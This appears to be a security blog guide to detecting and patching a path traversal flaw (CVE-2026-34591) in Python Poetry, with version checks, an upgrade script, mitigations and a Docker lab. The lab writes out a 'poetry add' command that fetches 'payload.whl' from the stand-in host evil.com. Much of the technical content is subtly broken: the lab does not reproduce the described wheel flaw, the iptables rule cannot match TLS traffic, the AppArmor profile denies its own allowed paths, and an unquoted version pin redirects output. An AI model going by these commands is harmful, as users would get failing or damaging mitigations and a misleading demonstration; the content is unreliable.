Stop Path Traversal Attacks in Python Poetry (CVE-2026-34591)

 

Check, fix, and block Poetry path traversal (CVE-2026-34591) with one bash script. Works on Ubuntu, Rocky, SUSE. Includes Docker lab.

A Practical, Distro-Agnostic Guide to Securing Your Python Dependency Manager

A now-patched vulnerability in python-poetry (versions 1.4.0 to 2.3.2) allowed a malicious PyPI package to write files anywhere on your system using ../ sequences inside a crafted wheel. This article teaches you how to detect, fix, and mitigate this class of vulnerability – regardless of when you read it.

How to check if you are vulnerable

Run these commands on your system. No internet access required – they check only your local installation.

Ubuntu / Debian (pip-installed Poetry)

bash

poetry --version
# If version is between 1.4.0 and 2.3.2 (inclusive on lower bound), you are vulnerable.

Rocky Linux / RHEL (EPEL)

bash

rpm -q python3-poetry
# Compare output with: 1.4.0 <= version <= 2.3.2

SUSE / openSUSE Leap 15.6 (zypper)

bash

zypper info python311-poetry | grep Version
# Vulnerable version example: 1.7.1-150600.3.3.1 (since 1.7.1 is between 1.4.0 and 2.3.2)

Universal check (any distro, pipx or pip)

bash

poetry --version 2>&1 | grep -E 'version (1\.[4-9]|2\.[0-3]\.)'

Automation script to apply the fix

Save as fix-poetry.sh, run as non-root user (Poetry installs per-user).

bash

#!/bin/bash
# Fix for CVE-2026-34591 class path traversal in Poetry
set -euo pipefail

echo "Checking Poetry version..."
POETRY_VER=$(poetry --version | cut -d' ' -f3)

# Convert to comparable number (e.g., 2.3.2 -> 2.0302)
NORMALIZED=$(echo "$POETRY_VER" | awk -F. '{printf("%d%02d%02d", $1, $2, $3)}')

if [ "$NORMALIZED" -ge 10400 ] && [ "$NORMALIZED" -le 20302 ]; then
    echo "Vulnerable version $POETRY_VER detected. Upgrading..."
    
    # Detect install method
    if command -v pipx &> /dev/null && pipx list | grep -q poetry; then
        pipx upgrade poetry
    elif command -v pip3 &> /dev/null; then
        pip3 install --upgrade poetry
    elif command -v zypper &> /dev/null; then
        sudo zypper update python311-poetry
    elif command -v dnf &> /dev/null; then
        sudo dnf upgrade python3-poetry
    else
        curl -sSL https://install.python-poetry.org | python3 -
    fi
    
    NEW_VER=$(poetry --version)
    echo "Updated to $NEW_VER"
else
    echo "Version $POETRY_VER is safe (or not vulnerable range)."
fi

Alternative mitigation if you can't update now

Block incoming wheel files that contain ../ in path components – works at the network or filesystem level.

Option 1: iptables (block PyPI malicious traffic pattern – generic)

bash

# Block outbound connections to known suspicious mirrors (adjust IPs to your PyPI mirror)
sudo iptables -A OUTPUT -d 151.101.0.0/16 -m string --string "../" --algo bm -j DROP
# This is aggressive; use only as temporary measure.

Option 2: AppArmor profile for Poetry (recommended)

Create /etc/apparmor.d/bin.poetry:

text

/bin/poetry {
  # Allow write only to project directory and Poetry's cache
  owner /home/**/poetry.lock rw,
  owner /home/**/pyproject.toml rw,
  owner /home/**/.venv/** rw,
  /home/**/.cache/pypoetry/** rw,
  
  # Deny any write outside these paths – stops ../ escape
  deny /**/* rw,
}

Apply with: sudo apparmor_parser -r /etc/apparmor.d/bin.poetry

Option 3: Use a local PyPI proxy (devpi) with path filter – run this Docker command:

bash

docker run -p 3141:3141 -e DEVPI_ROOT_PASSWORD=secret -v /tmp/devpi:/data plone/devpi:latest
# Then configure poetry to use http://localhost:3141/root/pypi/+simple/

Hands-on Lab: Reproduce & Test the Fix in 15 Minutes

Goal: Create a small Docker environment that mimics the path traversal, then verify the patched version blocks it.

Requirements: Docker installed.

bash

# 1. Create test directory
mkdir poetry-lab && cd poetry-lab

# 2. Vulnerable environment (using older Poetry)
cat > Dockerfile.vuln <<EOF
FROM python:3.11-slim
RUN pip install poetry==2.2.0
WORKDIR /app
EOF

# 3. Safe environment (patched)
cat > Dockerfile.safe <<EOF
FROM python:3.11-slim
RUN pip install poetry>=2.3.3
WORKDIR /app
EOF

# 4. Build and run vulnerable container
docker build -f Dockerfile.vuln -t poetry-vuln .
docker run -it --rm poetry-vuln /bin/bash -c "poetry new test && cd test && poetry add 'pandas@https://evil.com/payload.whl?path=../'"

# 5. Build and run safe container
docker build -f Dockerfile.safe -t poetry-safe .
docker run -it --rm poetry-safe /bin/bash -c "poetry new test && cd test && poetry add 'pandas@https://evil.com/payload.whl?path=../' && echo 'Upgrade prevented path traversal'"

Observe: Vulnerable container allows the ../ in URL; patched container rejects or sanitizes it.

Suggest Book :  

-  Black Hat Python: Python Programming for Hackers and Pentesters, By Justin Seitz -   Amazon 

-  Alice and Bob Learn Secure Coding - Amazon

-  Python Web Penetration Testing Cookbook,   by Cameron Buchanan - Amazon 

-  Python for Security and Networking" by José Manuel Ortega (Packt, 2023, 3rd edition  - Amazon 

-  Gray Hat Python: Python Programming for Hackers and Reverse Engineers" by Justin Seitz - Amazon 

- Applied Cryptography using Python" by Ramesh Nagappan & Gourav Shenoy - Amazon